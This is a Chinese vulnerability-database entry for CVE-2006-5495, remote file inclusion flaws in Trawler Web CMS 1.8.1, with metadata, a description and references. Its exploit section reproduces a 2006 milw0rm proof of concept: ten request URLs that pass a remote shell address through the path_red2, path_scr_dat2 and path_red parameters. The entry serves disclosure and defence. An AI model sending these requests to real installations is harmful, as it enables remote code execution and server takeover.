Trawler Web CMS多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111340 漏洞类型 输入验证
发布时间 2006-10-21 更新时间 2006-10-26
CVE编号 CVE-2006-5495 CNNVD-ID CNNVD-200610-421
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2611
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-421
|漏洞详情
TrawlerWebCMS1.8.1及更早版本中存在多个PHP远程文件包含漏洞,远程攻击者可以通过(1)(a)_msdazu_pdata/redaktion/artikel/up/index.php的path_red2参数;_msdazu_share/richtext/的(b)addtort.php,(c)colorpik2.php,(d)colorpik3.php,(e)extras_menu.php,(f)farbpalette.php,(g)lese_inc.php和(h)newfile.php;(2)(i)_msdazu_share/share/insert1.php的path_scr_dat2参数;(3)(j)_msdazu_share/extras/downloads/index.php的path_red参数;以及其他文件的不明参数中的URL来执行任意PHP代码。
|漏洞EXP
#########################################################################
# trawler <= 1.8.1  Remote File Inclusion
# Download Source : http://harald-kampen.de/trawler1.8.1.zip
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   --  #newhack[dot]org @irc.dal.net
########################################################################
exploit;
http://localhost/_msdazu_pdata/redaktion/artikel/up/index.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/addtort.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/colorpik2.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/colorpik3.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/extras_menu.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/farbpalette.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/lese_inc.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/newfile.php?path_red2=http://shell
http://localhost/_msdazu_share/share/insert1.php?path_scr_dat2=http://shell
http://localhost/_msdazu_share/extras/downloads/index.php?path_red=http://shell
and many more bug in this packet trawler ver 1.8.1 <-- :( this packet is
openbug
########################################################################
Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#nyubicrew [all member solpotcrew community]
#asiahacker [all member asiahacker community]

# milw0rm.com [2006-10-21]
|参考资料

来源:BID
名称:20662
链接:http://www.securityfocus.com/bid/20662
来源:SECUNIA
名称:22525
链接:http://secunia.com/advisories/22525
来源:MILW0RM
名称:2611
链接:http://milw0rm.com/exploits/2611
来源:MISC
链接:http://cmsblog.msdazu.de/?p=209
来源:XF
名称:trawler-pathred-file-include(29715)
链接:http://xforce.iss.net/xforce/xfdb/29715
来源:BID
名称:20678
链接:http://www.securityfocus.com/bid/20678
来源:BUGTRAQ
名称:20061021trawler<=1.8.1RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/449459/100/0/threaded
来源:OSVDB
名称:29969
链接:http://www.osvdb.org/29969
来源:OSVDB
名称:29968
链接:http://www.osvdb.org/29968
来源:OSVDB
名称:29967
链接:http://www.osvdb.org/29967
来源:OSVDB
名称:29966
链接:http://www.osvdb.org/29966
来源:OSVDB
名称:29965
链接:http://www.osvdb.org/29965
来源:OSVDB
名称:29964
链接:http://www.osvdb.org/29964
来源:OSVDB
名称:29963
链接:http://www.osvdb.org/29963
来源:OSVDB
名称:29962
链接:http://www.osvdb.org/29962
来源:OSVDB
名称:29961
链接:http://www.osvdb.org/29961
来源:OSVDB
名称:29960
链接:http://www.osvdb.org/29960
来源:VUPEN
名称:ADV-2006-4152
链接